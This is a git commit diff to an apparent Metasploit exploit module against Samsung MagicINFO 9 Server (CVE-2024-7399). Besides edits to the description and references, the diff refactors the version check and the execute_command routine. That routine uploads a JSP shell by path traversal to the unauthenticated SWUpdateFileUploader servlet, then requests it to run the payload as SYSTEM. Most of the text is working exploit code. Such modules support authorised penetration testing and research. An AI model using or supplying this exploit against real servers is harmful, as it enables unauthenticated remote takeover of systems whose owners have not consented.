Update magicinfo_traversal.rb

h4x-x0r · h4x-x0r · commit 6d2a1e529e72 · 2025-05-15T20:11:59.000+01:00
diff --git a/modules/exploits/windows/http/magicinfo_traversal.rb b/modules/exploits/windows/http/magicinfo_traversal.rb
@@ -11,7 +11,8 @@ def initialize(info = {})
         'Name' => 'Samsung MagicINFO 9 Server Remote Code Execution (CVE-2024-7399)',
         'Description' => %q{
           Remote Code Execution in Samsung MagicINFO 9 Server <= 21.1050.0.
-          Remote code execution can be obtained by exploiting a path traversal vulnerability (CVE-2024-7399) in the SWUpdateFileUploader servlet, which can be queried by an unauthenticated user.
+          Remote code execution can be obtained by exploiting the path traversal vulnerability (CVE-2024-7399) in the SWUpdateFileUploader servlet,
+          which can be queried by an unauthenticated user to upload a JSP shell.
           By default, the application listens on TCP ports 7001 (HTTP) and 7002 (HTTPS) on all network interfaces and runs in the context of NT AUTHORITY\SYSTEM.
         },
         'License' => MSF_LICENSE,
@@ -21,7 +22,8 @@ def initialize(info = {})
         ],
         'References' => [
           [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-samsung-magicinfo-unauthenticated-rce/'],
-          [ 'CVE', '2024-7399']
+          [ 'URL', 'https://security.samsungtv.com/securityUpdates'],
+          [ 'CVE', '2024-7399'] # SVE-2024-50018
         ],
         'DisclosureDate' => '2025-04-30',
         'DefaultOptions' => {
@@ -61,17 +63,16 @@ def check
       'uri' => normalize_uri(target_uri.path, 'config.js')
     })
 
-    return CheckCode::Unknown unless res && res.code == 200
+    return CheckCode::Unknown unless res&.code == 200
 
-    js_object = res.body.to_s[/window\.globalConfig\s*=\s*(\{.*\})/m, 1]
+    js_object = res.body.to_s[/window\.globalConfig = (\{.+\})/m, 1]
 
     fail_with(Failure::UnexpectedReply, 'Could not extract globalConfig object from response.') unless js_object
 
-    json_safe = js_object.gsub(/'/, '"')
-    json_safe.gsub!(/,(\s*[}\]])/, '\1')
-    data = JSON.parse(json_safe)
+    json_b = js_object.gsub(/'/, '"') # replace ' with " so that we can use JSON.parse on the response body
+    data = JSON.parse(json_b)
 
-    full_version = data['magicInfoFrontEndVersion']
+    full_version = data.fetch('magicInfoFrontEndVersion', nil)
     version = full_version[/Server\s+([\d.]+)/, 1]
 
     return CheckCode::Unknown unless version
@@ -101,14 +102,14 @@ def execute_command(cmd)
       'uri' => normalize_uri(target_uri.path, 'servlet', "SWUpdateFileUploader?fileName=./#{traversal}server/#{shell}.jsp")
     })
 
-    if res && res.code == 200
+    if res&.code == 200
       print_good('Upload successful.')
       res1 = send_request_cgi({
         'uri' => normalize_uri(target_uri.path, "#{shell}.jsp"),
         'method' => 'GET'
       })
 
-      fail_with(Failure::PayloadFailed, 'Failed to execute the payload.') unless res1 && res1.code == 200
+      fail_with(Failure::PayloadFailed, 'Failed to execute the payload.') unless res1&.code == 200
       print_status('Payload executed!')
 
     else
